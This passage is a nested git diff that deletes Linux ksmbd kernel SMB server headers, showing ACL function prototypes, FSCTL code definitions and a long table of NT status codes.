+-bool smb_inherit_flags(int flags, bool is_dir);
+-int smb_inherit_dacl(struct ksmbd_conn *conn, const struct path *path,
+-		     unsigned int uid, unsigned int gid);
+-int smb_check_perm_dacl(struct ksmbd_conn *conn, const struct path *path,
+-			__le32 *pdaccess, int uid);
+-int set_info_sec(struct ksmbd_conn *conn, struct ksmbd_tree_connect *tcon,
+-		 const struct path *path, struct smb_ntsd *pntsd, int ntsd_len,
+-		 bool type_check);
+-void id_to_sid(unsigned int cid, uint sidtype, struct smb_sid *ssid);
+-void ksmbd_init_domain(u32 *sub_auth);
+-
+-static inline uid_t posix_acl_uid_translate(struct user_namespace *mnt_userns,
+-					    struct posix_acl_entry *pace)
+-{
+-	vfsuid_t vfsuid;
+-
+-	/* If this is an idmapped mount, apply the idmapping. */
+-	vfsuid = make_vfsuid(mnt_userns, &init_user_ns, pace->e_uid);
+-
+-	/* Translate the kuid into a userspace id ksmbd would see. */
+-	return from_kuid(&init_user_ns, vfsuid_into_kuid(vfsuid));
+-}
+-
+-static inline gid_t posix_acl_gid_translate(struct user_namespace *mnt_userns,
+-					    struct posix_acl_entry *pace)
+-{
+-	vfsgid_t vfsgid;
+-
+-	/* If this is an idmapped mount, apply the idmapping. */
+-	vfsgid = make_vfsgid(mnt_userns, &init_user_ns, pace->e_gid);
+-
+-	/* Translate the kgid into a userspace id ksmbd would see. */
+-	return from_kgid(&init_user_ns, vfsgid_into_kgid(vfsgid));
+-}
+-
+-#endif /* _SMBACL_H */
+diff --git a/fs/ksmbd/smbfsctl.h b/fs/ksmbd/smbfsctl.h
+deleted file mode 100644
+index b98418aae20cd..0000000000000
+--- a/fs/ksmbd/smbfsctl.h
++++ /dev/null
+@@ -1,91 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1+ */
+-/*
+- *   fs/cifs/smbfsctl.h: SMB, CIFS, SMB2 FSCTL definitions
+- *
+- *   Copyright (c) International Business Machines  Corp., 2002,2009
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- */
+-
+-/* IOCTL information */
+-/*
+- * List of ioctl/fsctl function codes that are or could be useful in the
+- * future to remote clients like cifs or SMB2 client.  There is probably
+- * a slightly larger set of fsctls that NTFS local filesystem could handle,
+- * including the seven below that we do not have struct definitions for.
+- * Even with protocol definitions for most of these now available, we still
+- * need to do some experimentation to identify which are practical to do
+- * remotely.  Some of the following, such as the encryption/compression ones
+- * could be invoked from tools via a specialized hook into the VFS rather
+- * than via the standard vfs entry points
+- */
+-
+-#ifndef __KSMBD_SMBFSCTL_H
+-#define __KSMBD_SMBFSCTL_H
+-
+-#define FSCTL_DFS_GET_REFERRALS      0x00060194
+-#define FSCTL_DFS_GET_REFERRALS_EX   0x000601B0
+-#define FSCTL_REQUEST_OPLOCK_LEVEL_1 0x00090000
+-#define FSCTL_REQUEST_OPLOCK_LEVEL_2 0x00090004
+-#define FSCTL_REQUEST_BATCH_OPLOCK   0x00090008
+-#define FSCTL_LOCK_VOLUME            0x00090018
+-#define FSCTL_UNLOCK_VOLUME          0x0009001C
+-#define FSCTL_IS_PATHNAME_VALID      0x0009002C /* BB add struct */
+-#define FSCTL_GET_COMPRESSION        0x0009003C /* BB add struct */
+-#define FSCTL_SET_COMPRESSION        0x0009C040 /* BB add struct */
+-#define FSCTL_QUERY_FAT_BPB          0x00090058 /* BB add struct */
+-/* Verify the next FSCTL number, we had it as 0x00090090 before */
+-#define FSCTL_FILESYSTEM_GET_STATS   0x00090060 /* BB add struct */
+-#define FSCTL_GET_NTFS_VOLUME_DATA   0x00090064 /* BB add struct */
+-#define FSCTL_GET_RETRIEVAL_POINTERS 0x00090073 /* BB add struct */
+-#define FSCTL_IS_VOLUME_DIRTY        0x00090078 /* BB add struct */
+-#define FSCTL_ALLOW_EXTENDED_DASD_IO 0x00090083 /* BB add struct */
+-#define FSCTL_REQUEST_FILTER_OPLOCK  0x0009008C
+-#define FSCTL_FIND_FILES_BY_SID      0x0009008F /* BB add struct */
+-#define FSCTL_SET_OBJECT_ID          0x00090098 /* BB add struct */
+-#define FSCTL_GET_OBJECT_ID          0x0009009C /* BB add struct */
+-#define FSCTL_DELETE_OBJECT_ID       0x000900A0 /* BB add struct */
+-#define FSCTL_SET_REPARSE_POINT      0x000900A4 /* BB add struct */
+-#define FSCTL_GET_REPARSE_POINT      0x000900A8 /* BB add struct */
+-#define FSCTL_DELETE_REPARSE_POINT   0x000900AC /* BB add struct */
+-#define FSCTL_SET_OBJECT_ID_EXTENDED 0x000900BC /* BB add struct */
+-#define FSCTL_CREATE_OR_GET_OBJECT_ID 0x000900C0 /* BB add struct */
+-#define FSCTL_SET_SPARSE             0x000900C4 /* BB add struct */
+-#define FSCTL_SET_ZERO_DATA          0x000980C8 /* BB add struct */
+-#define FSCTL_SET_ENCRYPTION         0x000900D7 /* BB add struct */
+-#define FSCTL_ENCRYPTION_FSCTL_IO    0x000900DB /* BB add struct */
+-#define FSCTL_WRITE_RAW_ENCRYPTED    0x000900DF /* BB add struct */
+-#define FSCTL_READ_RAW_ENCRYPTED     0x000900E3 /* BB add struct */
+-#define FSCTL_READ_FILE_USN_DATA     0x000900EB /* BB add struct */
+-#define FSCTL_WRITE_USN_CLOSE_RECORD 0x000900EF /* BB add struct */
+-#define FSCTL_SIS_COPYFILE           0x00090100 /* BB add struct */
+-#define FSCTL_RECALL_FILE            0x00090117 /* BB add struct */
+-#define FSCTL_QUERY_SPARING_INFO     0x00090138 /* BB add struct */
+-#define FSCTL_SET_ZERO_ON_DEALLOC    0x00090194 /* BB add struct */
+-#define FSCTL_SET_SHORT_NAME_BEHAVIOR 0x000901B4 /* BB add struct */
+-#define FSCTL_QUERY_ALLOCATED_RANGES 0x000940CF /* BB add struct */
+-#define FSCTL_SET_DEFECT_MANAGEMENT  0x00098134 /* BB add struct */
+-#define FSCTL_DUPLICATE_EXTENTS_TO_FILE 0x00098344
+-#define FSCTL_SIS_LINK_FILES         0x0009C104
+-#define FSCTL_PIPE_PEEK              0x0011400C /* BB add struct */
+-#define FSCTL_PIPE_TRANSCEIVE        0x0011C017 /* BB add struct */
+-/* strange that the number for this op is not sequential with previous op */
+-#define FSCTL_PIPE_WAIT              0x00110018 /* BB add struct */
+-#define FSCTL_REQUEST_RESUME_KEY     0x00140078
+-#define FSCTL_LMR_GET_LINK_TRACK_INF 0x001400E8 /* BB add struct */
+-#define FSCTL_LMR_SET_LINK_TRACK_INF 0x001400EC /* BB add struct */
+-#define FSCTL_VALIDATE_NEGOTIATE_INFO 0x00140204
+-#define FSCTL_QUERY_NETWORK_INTERFACE_INFO 0x001401FC
+-#define FSCTL_COPYCHUNK              0x001440F2
+-#define FSCTL_COPYCHUNK_WRITE        0x001480F2
+-
+-#define IO_REPARSE_TAG_MOUNT_POINT   0xA0000003
+-#define IO_REPARSE_TAG_HSM           0xC0000004
+-#define IO_REPARSE_TAG_SIS           0x80000007
+-
+-/* WSL reparse tags */
+-#define IO_REPARSE_TAG_LX_SYMLINK_LE	cpu_to_le32(0xA000001D)
+-#define IO_REPARSE_TAG_AF_UNIX_LE	cpu_to_le32(0x80000023)
+-#define IO_REPARSE_TAG_LX_FIFO_LE	cpu_to_le32(0x80000024)
+-#define IO_REPARSE_TAG_LX_CHR_LE	cpu_to_le32(0x80000025)
+-#define IO_REPARSE_TAG_LX_BLK_LE	cpu_to_le32(0x80000026)
+-#endif /* __KSMBD_SMBFSCTL_H */
+diff --git a/fs/ksmbd/smbstatus.h b/fs/ksmbd/smbstatus.h
+deleted file mode 100644
+index 108a8b6ed24a0..0000000000000
+--- a/fs/ksmbd/smbstatus.h
++++ /dev/null
+@@ -1,1822 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1+ */
+-/*
+- *   fs/cifs/smb2status.h
+- *
+- *   SMB2 Status code (network error) definitions
+- *   Definitions are from MS-ERREF
+- *
+- *   Copyright (c) International Business Machines  Corp., 2009,2011
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- */
+-
+-/*
+- *  0 1 2 3 4 5 6 7 8 9 0 A B C D E F 0 1 2 3 4 5 6 7 8 9 A B C D E F
+- *  SEV C N <-------Facility--------> <------Error Status Code------>
+- *
+- *  C is set if "customer defined" error, N bit is reserved and MBZ
+- */
+-
+-#define STATUS_SEVERITY_SUCCESS cpu_to_le32(0x0000)
+-#define STATUS_SEVERITY_INFORMATIONAL cpu_to_le32(0x0001)
+-#define STATUS_SEVERITY_WARNING cpu_to_le32(0x0002)
+-#define STATUS_SEVERITY_ERROR cpu_to_le32(0x0003)
+-
+-struct ntstatus {
+-	/* Facility is the high 12 bits of the following field */
+-	__le32 Facility; /* low 2 bits Severity, next is Customer, then rsrvd */
+-	__le32 Code;
+-};
+-
+-#define STATUS_SUCCESS 0x00000000
+-#define STATUS_WAIT_0 cpu_to_le32(0x00000000)
+-#define STATUS_WAIT_1 cpu_to_le32(0x00000001)
+-#define STATUS_WAIT_2 cpu_to_le32(0x00000002)
+-#define STATUS_WAIT_3 cpu_to_le32(0x00000003)
+-#define STATUS_WAIT_63 cpu_to_le32(0x0000003F)
+-#define STATUS_ABANDONED cpu_to_le32(0x00000080)
+-#define STATUS_ABANDONED_WAIT_0 cpu_to_le32(0x00000080)
+-#define STATUS_ABANDONED_WAIT_63 cpu_to_le32(0x000000BF)
+-#define STATUS_USER_APC cpu_to_le32(0x000000C0)
+-#define STATUS_KERNEL_APC cpu_to_le32(0x00000100)
+-#define STATUS_ALERTED cpu_to_le32(0x00000101)
+-#define STATUS_TIMEOUT cpu_to_le32(0x00000102)
+-#define STATUS_PENDING cpu_to_le32(0x00000103)
+-#define STATUS_REPARSE cpu_to_le32(0x00000104)
+-#define STATUS_MORE_ENTRIES cpu_to_le32(0x00000105)
+-#define STATUS_NOT_ALL_ASSIGNED cpu_to_le32(0x00000106)
+-#define STATUS_SOME_NOT_MAPPED cpu_to_le32(0x00000107)
+-#define STATUS_OPLOCK_BREAK_IN_PROGRESS cpu_to_le32(0x00000108)
+-#define STATUS_VOLUME_MOUNTED cpu_to_le32(0x00000109)
+-#define STATUS_RXACT_COMMITTED cpu_to_le32(0x0000010A)
+-#define STATUS_NOTIFY_CLEANUP cpu_to_le32(0x0000010B)
+-#define STATUS_NOTIFY_ENUM_DIR cpu_to_le32(0x0000010C)
+-#define STATUS_NO_QUOTAS_FOR_ACCOUNT cpu_to_le32(0x0000010D)
+-#define STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED cpu_to_le32(0x0000010E)
+-#define STATUS_PAGE_FAULT_TRANSITION cpu_to_le32(0x00000110)
+-#define STATUS_PAGE_FAULT_DEMAND_ZERO cpu_to_le32(0x00000111)
+-#define STATUS_PAGE_FAULT_COPY_ON_WRITE cpu_to_le32(0x00000112)
+-#define STATUS_PAGE_FAULT_GUARD_PAGE cpu_to_le32(0x00000113)
+-#define STATUS_PAGE_FAULT_PAGING_FILE cpu_to_le32(0x00000114)
+-#define STATUS_CACHE_PAGE_LOCKED cpu_to_le32(0x00000115)
+-#define STATUS_CRASH_DUMP cpu_to_le32(0x00000116)
+-#define STATUS_BUFFER_ALL_ZEROS cpu_to_le32(0x00000117)
+-#define STATUS_REPARSE_OBJECT cpu_to_le32(0x00000118)
+-#define STATUS_RESOURCE_REQUIREMENTS_CHANGED cpu_to_le32(0x00000119)
+-#define STATUS_TRANSLATION_COMPLETE cpu_to_le32(0x00000120)
+-#define STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY cpu_to_le32(0x00000121)
+-#define STATUS_NOTHING_TO_TERMINATE cpu_to_le32(0x00000122)
+-#define STATUS_PROCESS_NOT_IN_JOB cpu_to_le32(0x00000123)
+-#define STATUS_PROCESS_IN_JOB cpu_to_le32(0x00000124)
+-#define STATUS_VOLSNAP_HIBERNATE_READY cpu_to_le32(0x00000125)
+-#define STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY cpu_to_le32(0x00000126)
+-#define STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED cpu_to_le32(0x00000127)
+-#define STATUS_INTERRUPT_STILL_CONNECTED cpu_to_le32(0x00000128)
+-#define STATUS_PROCESS_CLONED cpu_to_le32(0x00000129)
+-#define STATUS_FILE_LOCKED_WITH_ONLY_READERS cpu_to_le32(0x0000012A)
+-#define STATUS_FILE_LOCKED_WITH_WRITERS cpu_to_le32(0x0000012B)
+-#define STATUS_RESOURCEMANAGER_READ_ONLY cpu_to_le32(0x00000202)
+-#define STATUS_WAIT_FOR_OPLOCK cpu_to_le32(0x00000367)
+-#define DBG_EXCEPTION_HANDLED cpu_to_le32(0x00010001)
+-#define DBG_CONTINUE cpu_to_le32(0x00010002)
+-#define STATUS_FLT_IO_COMPLETE cpu_to_le32(0x001C0001)
+-#define STATUS_OBJECT_NAME_EXISTS cpu_to_le32(0x40000000)
+-#define STATUS_THREAD_WAS_SUSPENDED cpu_to_le32(0x40000001)
+-#define STATUS_WORKING_SET_LIMIT_RANGE cpu_to_le32(0x40000002)
+-#define STATUS_IMAGE_NOT_AT_BASE cpu_to_le32(0x40000003)
+-#define STATUS_RXACT_STATE_CREATED cpu_to_le32(0x40000004)
+-#define STATUS_SEGMENT_NOTIFICATION cpu_to_le32(0x40000005)
+-#define STATUS_LOCAL_USER_SESSION_KEY cpu_to_le32(0x40000006)
+-#define STATUS_BAD_CURRENT_DIRECTORY cpu_to_le32(0x40000007)
+-#define STATUS_SERIAL_MORE_WRITES cpu_to_le32(0x40000008)
+-#define STATUS_REGISTRY_RECOVERED cpu_to_le32(0x40000009)
+-#define STATUS_FT_READ_RECOVERY_FROM_BACKUP cpu_to_le32(0x4000000A)
+-#define STATUS_FT_WRITE_RECOVERY cpu_to_le32(0x4000000B)
+-#define STATUS_SERIAL_COUNTER_TIMEOUT cpu_to_le32(0x4000000C)
+-#define STATUS_NULL_LM_PASSWORD cpu_to_le32(0x4000000D)
+-#define STATUS_IMAGE_MACHINE_TYPE_MISMATCH cpu_to_le32(0x4000000E)
+-#define STATUS_RECEIVE_PARTIAL cpu_to_le32(0x4000000F)
+-#define STATUS_RECEIVE_EXPEDITED cpu_to_le32(0x40000010)
+-#define STATUS_RECEIVE_PARTIAL_EXPEDITED cpu_to_le32(0x40000011)
+-#define STATUS_EVENT_DONE cpu_to_le32(0x40000012)
+-#define STATUS_EVENT_PENDING cpu_to_le32(0x40000013)
+-#define STATUS_CHECKING_FILE_SYSTEM cpu_to_le32(0x40000014)
+-#define STATUS_FATAL_APP_EXIT cpu_to_le32(0x40000015)
+-#define STATUS_PREDEFINED_HANDLE cpu_to_le32(0x40000016)
+-#define STATUS_WAS_UNLOCKED cpu_to_le32(0x40000017)
+-#define STATUS_SERVICE_NOTIFICATION cpu_to_le32(0x40000018)
+-#define STATUS_WAS_LOCKED cpu_to_le32(0x40000019)
+-#define STATUS_LOG_HARD_ERROR cpu_to_le32(0x4000001A)
+-#define STATUS_ALREADY_WIN32 cpu_to_le32(0x4000001B)
+-#define STATUS_WX86_UNSIMULATE cpu_to_le32(0x4000001C)
+-#define STATUS_WX86_CONTINUE cpu_to_le32(0x4000001D)
+-#define STATUS_WX86_SINGLE_STEP cpu_to_le32(0x4000001E)
+-#define STATUS_WX86_BREAKPOINT cpu_to_le32(0x4000001F)
+-#define STATUS_WX86_EXCEPTION_CONTINUE cpu_to_le32(0x40000020)
+-#define STATUS_WX86_EXCEPTION_LASTCHANCE cpu_to_le32(0x40000021)
+-#define STATUS_WX86_EXCEPTION_CHAIN cpu_to_le32(0x40000022)
+-#define STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE cpu_to_le32(0x40000023)
+-#define STATUS_NO_YIELD_PERFORMED cpu_to_le32(0x40000024)
+-#define STATUS_TIMER_RESUME_IGNORED cpu_to_le32(0x40000025)
+-#define STATUS_ARBITRATION_UNHANDLED cpu_to_le32(0x40000026)
+-#define STATUS_CARDBUS_NOT_SUPPORTED cpu_to_le32(0x40000027)
+-#define STATUS_WX86_CREATEWX86TIB cpu_to_le32(0x40000028)
+-#define STATUS_MP_PROCESSOR_MISMATCH cpu_to_le32(0x40000029)
+-#define STATUS_HIBERNATED cpu_to_le32(0x4000002A)
+-#define STATUS_RESUME_HIBERNATION cpu_to_le32(0x4000002B)
+-#define STATUS_FIRMWARE_UPDATED cpu_to_le32(0x4000002C)
+-#define STATUS_DRIVERS_LEAKING_LOCKED_PAGES cpu_to_le32(0x4000002D)
+-#define STATUS_MESSAGE_RETRIEVED cpu_to_le32(0x4000002E)
+-#define STATUS_SYSTEM_POWERSTATE_TRANSITION cpu_to_le32(0x4000002F)
+-#define STATUS_ALPC_CHECK_COMPLETION_LIST cpu_to_le32(0x40000030)
+-#define STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION cpu_to_le32(0x40000031)
+-#define STATUS_ACCESS_AUDIT_BY_POLICY cpu_to_le32(0x40000032)
+-#define STATUS_ABANDON_HIBERFILE cpu_to_le32(0x40000033)
+-#define STATUS_BIZRULES_NOT_ENABLED cpu_to_le32(0x40000034)
+-#define STATUS_WAKE_SYSTEM cpu_to_le32(0x40000294)
+-#define STATUS_DS_SHUTTING_DOWN cpu_to_le32(0x40000370)
+-#define DBG_REPLY_LATER cpu_to_le32(0x40010001)
+-#define DBG_UNABLE_TO_PROVIDE_HANDLE cpu_to_le32(0x40010002)
+-#define DBG_TERMINATE_THREAD cpu_to_le32(0x40010003)
+-#define DBG_TERMINATE_PROCESS cpu_to_le32(0x40010004)
+-#define DBG_CONTROL_C cpu_to_le32(0x40010005)
+-#define DBG_PRINTEXCEPTION_C cpu_to_le32(0x40010006)
+-#define DBG_RIPEXCEPTION cpu_to_le32(0x40010007)
+-#define DBG_CONTROL_BREAK cpu_to_le32(0x40010008)
+-#define DBG_COMMAND_EXCEPTION cpu_to_le32(0x40010009)
+-#define RPC_NT_UUID_LOCAL_ONLY cpu_to_le32(0x40020056)
+-#define RPC_NT_SEND_INCOMPLETE cpu_to_le32(0x400200AF)
+-#define STATUS_CTX_CDM_CONNECT cpu_to_le32(0x400A0004)
+-#define STATUS_CTX_CDM_DISCONNECT cpu_to_le32(0x400A0005)
+-#define STATUS_SXS_RELEASE_ACTIVATION_CONTEXT cpu_to_le32(0x4015000D)
+-#define STATUS_RECOVERY_NOT_NEEDED cpu_to_le32(0x40190034)
+-#define STATUS_RM_ALREADY_STARTED cpu_to_le32(0x40190035)
+-#define STATUS_LOG_NO_RESTART cpu_to_le32(0x401A000C)
+-#define STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST cpu_to_le32(0x401B00EC)
+-#define STATUS_GRAPHICS_PARTIAL_DATA_POPULATED cpu_to_le32(0x401E000A)
+-#define STATUS_GRAPHICS_DRIVER_MISMATCH cpu_to_le32(0x401E0117)
+-#define STATUS_GRAPHICS_MODE_NOT_PINNED cpu_to_le32(0x401E0307)
+-#define STATUS_GRAPHICS_NO_PREFERRED_MODE cpu_to_le32(0x401E031E)
+-#define STATUS_GRAPHICS_DATASET_IS_EMPTY cpu_to_le32(0x401E034B)
+-#define STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET cpu_to_le32(0x401E034C)
+-#define STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED	\
+-	cpu_to_le32(0x401E0351)
+-#define STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS cpu_to_le32(0x401E042F)
+-#define STATUS_GRAPHICS_LEADLINK_START_DEFERRED cpu_to_le32(0x401E0437)
+-#define STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY cpu_to_le32(0x401E0439)
+-#define STATUS_GRAPHICS_START_DEFERRED cpu_to_le32(0x401E043A)
+-#define STATUS_NDIS_INDICATION_REQUIRED cpu_to_le32(0x40230001)
+-#define STATUS_GUARD_PAGE_VIOLATION cpu_to_le32(0x80000001)
+-#define STATUS_DATATYPE_MISALIGNMENT cpu_to_le32(0x80000002)
+-#define STATUS_BREAKPOINT cpu_to_le32(0x80000003)
+-#define STATUS_SINGLE_STEP cpu_to_le32(0x80000004)
+-#define STATUS_BUFFER_OVERFLOW cpu_to_le32(0x80000005)
+-#define STATUS_NO_MORE_FILES cpu_to_le32(0x80000006)
+-#define STATUS_WAKE_SYSTEM_DEBUGGER cpu_to_le32(0x80000007)
+-#define STATUS_HANDLES_CLOSED cpu_to_le32(0x8000000A)
+-#define STATUS_NO_INHERITANCE cpu_to_le32(0x8000000B)
+-#define STATUS_GUID_SUBSTITUTION_MADE cpu_to_le32(0x8000000C)
+-#define STATUS_PARTIAL_COPY cpu_to_le32(0x8000000D)
+-#define STATUS_DEVICE_PAPER_EMPTY cpu_to_le32(0x8000000E)
+-#define STATUS_DEVICE_POWERED_OFF cpu_to_le32(0x8000000F)
+-#define STATUS_DEVICE_OFF_LINE cpu_to_le32(0x80000010)
+-#define STATUS_DEVICE_BUSY cpu_to_le32(0x80000011)
+-#define STATUS_NO_MORE_EAS cpu_to_le32(0x80000012)
+-#define STATUS_INVALID_EA_NAME cpu_to_le32(0x80000013)
+-#define STATUS_EA_LIST_INCONSISTENT cpu_to_le32(0x80000014)
+-#define STATUS_INVALID_EA_FLAG cpu_to_le32(0x80000015)
+-#define STATUS_VERIFY_REQUIRED cpu_to_le32(0x80000016)
+-#define STATUS_EXTRANEOUS_INFORMATION cpu_to_le32(0x80000017)
+-#define STATUS_RXACT_COMMIT_NECESSARY cpu_to_le32(0x80000018)
+-#define STATUS_NO_MORE_ENTRIES cpu_to_le32(0x8000001A)
+-#define STATUS_FILEMARK_DETECTED cpu_to_le32(0x8000001B)
+-#define STATUS_MEDIA_CHANGED cpu_to_le32(0x8000001C)
+-#define STATUS_BUS_RESET cpu_to_le32(0x8000001D)
+-#define STATUS_END_OF_MEDIA cpu_to_le32(0x8000001E)
+-#define STATUS_BEGINNING_OF_MEDIA cpu_to_le32(0x8000001F)
+-#define STATUS_MEDIA_CHECK cpu_to_le32(0x80000020)
+-#define STATUS_SETMARK_DETECTED cpu_to_le32(0x80000021)
+-#define STATUS_NO_DATA_DETECTED cpu_to_le32(0x80000022)
+-#define STATUS_REDIRECTOR_HAS_OPEN_HANDLES cpu_to_le32(0x80000023)
+-#define STATUS_SERVER_HAS_OPEN_HANDLES cpu_to_le32(0x80000024)
+-#define STATUS_ALREADY_DISCONNECTED cpu_to_le32(0x80000025)
+-#define STATUS_LONGJUMP cpu_to_le32(0x80000026)
+-#define STATUS_CLEANER_CARTRIDGE_INSTALLED cpu_to_le32(0x80000027)
+-#define STATUS_PLUGPLAY_QUERY_VETOED cpu_to_le32(0x80000028)
+-#define STATUS_UNWIND_CONSOLIDATE cpu_to_le32(0x80000029)
+-#define STATUS_REGISTRY_HIVE_RECOVERED cpu_to_le32(0x8000002A)
+-#define STATUS_DLL_MIGHT_BE_INSECURE cpu_to_le32(0x8000002B)
+-#define STATUS_DLL_MIGHT_BE_INCOMPATIBLE cpu_to_le32(0x8000002C)
+-#define STATUS_STOPPED_ON_SYMLINK cpu_to_le32(0x8000002D)
+-#define STATUS_DEVICE_REQUIRES_CLEANING cpu_to_le32(0x80000288)
+-#define STATUS_DEVICE_DOOR_OPEN cpu_to_le32(0x80000289)
+-#define STATUS_DATA_LOST_REPAIR cpu_to_le32(0x80000803)
+-#define DBG_EXCEPTION_NOT_HANDLED cpu_to_le32(0x80010001)
+-#define STATUS_CLUSTER_NODE_ALREADY_UP cpu_to_le32(0x80130001)
+-#define STATUS_CLUSTER_NODE_ALREADY_DOWN cpu_to_le32(0x80130002)
+-#define STATUS_CLUSTER_NETWORK_ALREADY_ONLINE cpu_to_le32(0x80130003)
+-#define STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE cpu_to_le32(0x80130004)
+-#define STATUS_CLUSTER_NODE_ALREADY_MEMBER cpu_to_le32(0x80130005)
+-#define STATUS_COULD_NOT_RESIZE_LOG cpu_to_le32(0x80190009)
+-#define STATUS_NO_TXF_METADATA cpu_to_le32(0x80190029)
+-#define STATUS_CANT_RECOVER_WITH_HANDLE_OPEN cpu_to_le32(0x80190031)
+-#define STATUS_TXF_METADATA_ALREADY_PRESENT cpu_to_le32(0x80190041)
+-#define STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET cpu_to_le32(0x80190042)
+-#define STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED	\
+-	cpu_to_le32(0x801B00EB)
+-#define STATUS_FLT_BUFFER_TOO_SMALL cpu_to_le32(0x801C0001)
+-#define STATUS_FVE_PARTIAL_METADATA cpu_to_le32(0x80210001)
+-#define STATUS_UNSUCCESSFUL cpu_to_le32(0xC0000001)
+-#define STATUS_NOT_IMPLEMENTED cpu_to_le32(0xC0000002)
+-#define STATUS_INVALID_INFO_CLASS cpu_to_le32(0xC0000003)
+-#define STATUS_INFO_LENGTH_MISMATCH cpu_to_le32(0xC0000004)
+-#define STATUS_ACCESS_VIOLATION cpu_to_le32(0xC0000005)
+-#define STATUS_IN_PAGE_ERROR cpu_to_le32(0xC0000006)
+-#define STATUS_PAGEFILE_QUOTA cpu_to_le32(0xC0000007)
+-#define STATUS_INVALID_HANDLE cpu_to_le32(0xC0000008)
+-#define STATUS_BAD_INITIAL_STACK cpu_to_le32(0xC0000009)
+-#define STATUS_BAD_INITIAL_PC cpu_to_le32(0xC000000A)
+-#define STATUS_INVALID_CID cpu_to_le32(0xC000000B)
+-#define STATUS_TIMER_NOT_CANCELED cpu_to_le32(0xC000000C)
+-#define STATUS_INVALID_PARAMETER cpu_to_le32(0xC000000D)
+-#define STATUS_NO_SUCH_DEVICE cpu_to_le32(0xC000000E)
+-#define STATUS_NO_SUCH_FILE cpu_to_le32(0xC000000F)
+-#define STATUS_INVALID_DEVICE_REQUEST cpu_to_le32(0xC0000010)
+-#define STATUS_END_OF_FILE cpu_to_le32(0xC0000011)
+-#define STATUS_WRONG_VOLUME cpu_to_le32(0xC0000012)
+-#define STATUS_NO_MEDIA_IN_DEVICE cpu_to_le32(0xC0000013)
+-#define STATUS_UNRECOGNIZED_MEDIA cpu_to_le32(0xC0000014)
+-#define STATUS_NONEXISTENT_SECTOR cpu_to_le32(0xC0000015)
+-#define STATUS_MORE_PROCESSING_REQUIRED cpu_to_le32(0xC0000016)
+-#define STATUS_NO_MEMORY cpu_to_le32(0xC0000017)
+-#define STATUS_CONFLICTING_ADDRESSES cpu_to_le32(0xC0000018)
+-#define STATUS_NOT_MAPPED_VIEW cpu_to_le32(0xC0000019)
+-#define STATUS_UNABLE_TO_FREE_VM cpu_to_le32(0xC000001A)
+-#define STATUS_UNABLE_TO_DELETE_SECTION cpu_to_le32(0xC000001B)
+-#define STATUS_INVALID_SYSTEM_SERVICE cpu_to_le32(0xC000001C)
+-#define STATUS_ILLEGAL_INSTRUCTION cpu_to_le32(0xC000001D)
+-#define STATUS_INVALID_LOCK_SEQUENCE cpu_to_le32(0xC000001E)
+-#define STATUS_INVALID_VIEW_SIZE cpu_to_le32(0xC000001F)
+-#define STATUS_INVALID_FILE_FOR_SECTION cpu_to_le32(0xC0000020)
+-#define STATUS_ALREADY_COMMITTED cpu_to_le32(0xC0000021)
+-#define STATUS_ACCESS_DENIED cpu_to_le32(0xC0000022)
+-#define STATUS_BUFFER_TOO_SMALL cpu_to_le32(0xC0000023)
+-#define STATUS_OBJECT_TYPE_MISMATCH cpu_to_le32(0xC0000024)
+-#define STATUS_NONCONTINUABLE_EXCEPTION cpu_to_le32(0xC0000025)
+-#define STATUS_INVALID_DISPOSITION cpu_to_le32(0xC0000026)
+-#define STATUS_UNWIND cpu_to_le32(0xC0000027)
+-#define STATUS_BAD_STACK cpu_to_le32(0xC0000028)
+-#define STATUS_INVALID_UNWIND_TARGET cpu_to_le32(0xC0000029)
+-#define STATUS_NOT_LOCKED cpu_to_le32(0xC000002A)
+-#define STATUS_PARITY_ERROR cpu_to_le32(0xC000002B)
+-#define STATUS_UNABLE_TO_DECOMMIT_VM cpu_to_le32(0xC000002C)
+-#define STATUS_NOT_COMMITTED cpu_to_le32(0xC000002D)
+-#define STATUS_INVALID_PORT_ATTRIBUTES cpu_to_le32(0xC000002E)
+-#define STATUS_PORT_MESSAGE_TOO_LONG cpu_to_le32(0xC000002F)
+-#define STATUS_INVALID_PARAMETER_MIX cpu_to_le32(0xC0000030)
+-#define STATUS_INVALID_QUOTA_LOWER cpu_to_le32(0xC0000031)
+-#define STATUS_DISK_CORRUPT_ERROR cpu_to_le32(0xC0000032)
+-#define STATUS_OBJECT_NAME_INVALID cpu_to_le32(0xC0000033)
+-#define STATUS_OBJECT_NAME_NOT_FOUND cpu_to_le32(0xC0000034)
+-#define STATUS_OBJECT_NAME_COLLISION cpu_to_le32(0xC0000035)
+-#define STATUS_PORT_DISCONNECTED cpu_to_le32(0xC0000037)
+-#define STATUS_DEVICE_ALREADY_ATTACHED cpu_to_le32(0xC0000038)
+-#define STATUS_OBJECT_PATH_INVALID cpu_to_le32(0xC0000039)
+-#define STATUS_OBJECT_PATH_NOT_FOUND cpu_to_le32(0xC000003A)
+-#define STATUS_OBJECT_PATH_SYNTAX_BAD cpu_to_le32(0xC000003B)
+-#define STATUS_DATA_OVERRUN cpu_to_le32(0xC000003C)
+-#define STATUS_DATA_LATE_ERROR cpu_to_le32(0xC000003D)
+-#define STATUS_DATA_ERROR cpu_to_le32(0xC000003E)
+-#define STATUS_CRC_ERROR cpu_to_le32(0xC000003F)
+-#define STATUS_SECTION_TOO_BIG cpu_to_le32(0xC0000040)
+-#define STATUS_PORT_CONNECTION_REFUSED cpu_to_le32(0xC0000041)
+-#define STATUS_INVALID_PORT_HANDLE cpu_to_le32(0xC0000042)
+-#define STATUS_SHARING_VIOLATION cpu_to_le32(0xC0000043)
